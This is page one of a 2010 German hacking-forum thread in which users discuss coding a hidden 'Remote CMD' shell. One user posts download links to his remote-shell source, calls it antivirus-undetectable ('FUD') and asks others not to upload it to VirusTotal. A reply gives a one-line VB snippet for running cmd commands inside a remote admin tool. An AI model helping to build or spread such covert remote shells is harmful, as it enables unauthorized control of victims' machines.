Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14

Thema: Remote CMD

  1. #1
    Neuling
    Registriert seit
    05.03.2010
    Beiträge
    1

    Standard Remote CMD

    Hi Leute ich hab da mal ne Frage und ich hoffe ihr könnt mir ein paar Denkanstösse geben. Und zwar wollte ich eine Remote CMD coden. Wie kann ich das am leichtesten anstellen ohne alle Befehle der CMD.exe nach zucoden? Hab es mir so vorgestellt das ich die CMD mit shellexecute im hide modus starte und dann die fenster ausgaben aus der cmd auslese und Key eingaben an das fenster sende, Oder hat von euch jemand eine andere Idee. Egal ob man Assembler oder Api befehle verwenden muss das ist alles kein Prob bräuche nur nen Denkanstoss :twisted

  2. #2
    OpCodeKiddy Avatar von EBFE
    Registriert seit
    30.03.2009
    Beiträge
    442
    TrueCrypt/RAR/Zip Passwort vergessen und das Bruten dauert ewig? Oder brauchst du fein abgestimmte Wortlisten? Hilf dir selbst mit WLML - Word List Markup Language
    Gib Stoned/Mebroot/Sinowal und anderen Bootkits keine Chance: Anti Bootkit v 0.8.5

  3. #3
    Stiller Leser
    Registriert seit
    14.03.2010
    Beiträge
    3

    Standard

    Zitat Zitat von o0_X0r_0o Beitrag anzeigen
    Hi Leute ich hab da mal ne Frage und ich hoffe ihr könnt mir ein paar Denkanstösse geben. Und zwar wollte ich eine Remote CMD coden. Wie kann ich das am leichtesten anstellen ohne alle Befehle der CMD.exe nach zucoden? Hab es mir so vorgestellt das ich die CMD mit shellexecute im hide modus starte und dann die fenster ausgaben aus der cmd auslese und Key eingaben an das fenster sende, Oder hat von euch jemand eine andere Idee. Egal ob man Assembler oder Api befehle verwenden muss das ist alles kein Prob bräuche nur nen Denkanstoss :twisted
    Habe sowas schon gemacht kann dir bei intresse meine source mal schicken

  4. #4
    W64.run Avatar von Clode
    Registriert seit
    02.10.2008
    Beiträge
    233

    Standard

    shadow da hab ich auch interesse dran, könntest du deinen source mal uppen und hier reinstellen?

  5. #5
    Stiller Leser
    Registriert seit
    14.03.2010
    Beiträge
    3

    Standard

    Zitat Zitat von Clode Beitrag anzeigen
    shadow da hab ich auch interesse dran, könntest du deinen source mal uppen und hier reinstellen?
    Stelle einen Link rein. ich denke mal das ich euch vertrauen kann und ihr "keinen" Mist damit macht ^^.
    Link : http://stick.no-ip.biz/Remote-Shell-bzw-Remote-CMD.rar (fals der Link mal down ist liegt es daran das mein Pc aus ist.)
    (ist bis jetzt auch 100% Fud ^^ also auch nicht auf virustotal oder so hochladen !:twisted)
    mfg Shadow52

  6. #6
    └──┤Ω-Virus├──┘
    Registriert seit
    30.07.2007
    Beiträge
    167

    Standard

    Zitat Zitat von Shadow52 Beitrag anzeigen
    Stelle einen Link rein. ich denke mal das ich euch vertrauen kann und ihr "keinen" Mist damit macht ^^.
    Link : http://stick.no-ip.biz/Remote-Shell-bzw-Remote-CMD.rar (fals der Link mal down ist liegt es daran das mein Pc aus ist.)
    (ist bis jetzt auch 100% Fud ^^ also auch nicht auf virustotal oder so hochladen !:twisted)
    mfg Shadow52
    könntest du das evtl auf einen gscheiten hoster laden? :b

  7. #7
    Stiller Leser
    Registriert seit
    14.03.2010
    Beiträge
    3

    Standard

    Zitat Zitat von Omegavirus Beitrag anzeigen
    könntest du das evtl auf einen gscheiten hoster laden? :b
    http://weisnichtspy1.we.ohost.de/Rem...Remote-CMD.rar

  8. #8
    Anfänger
    Registriert seit
    10.06.2010
    Beiträge
    9

    Standard

    Hi,
    bin neu hier und programmiere seit kurzem in vb.net . ich bin dabei ein kleines tool zu erstellen. dafür muss ich unbedingt wissen wie man remote cmd programmiert. die links von shadow52 gehen bei mir nicht und ich wollte fragen ob einer das noch mal zeigt.
    wäre sehr dankbar!

    gruß archer

  9. #9
    Gesperrt
    Registriert seit
    20.01.2010
    Beiträge
    125

    Standard

    Wen du ein Rar oder remote admin tool machen wilslt solltest du ja wissen wie man strings etc. per TCP/IP oder so an ein anderes Prog senden.
    Dan mach es einfach per shell.

    Also ein befehl in shell (CMD) sieht so aus :

    Shell("cmd /c " & chr(34) & "befehl" & chr(34))

  10. #10
    Anfänger
    Registriert seit
    10.06.2010
    Beiträge
    9

    Standard

    wo ist der thx boutton?
    Geändert von archer (19.06.2010 um 16:56 Uhr)

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •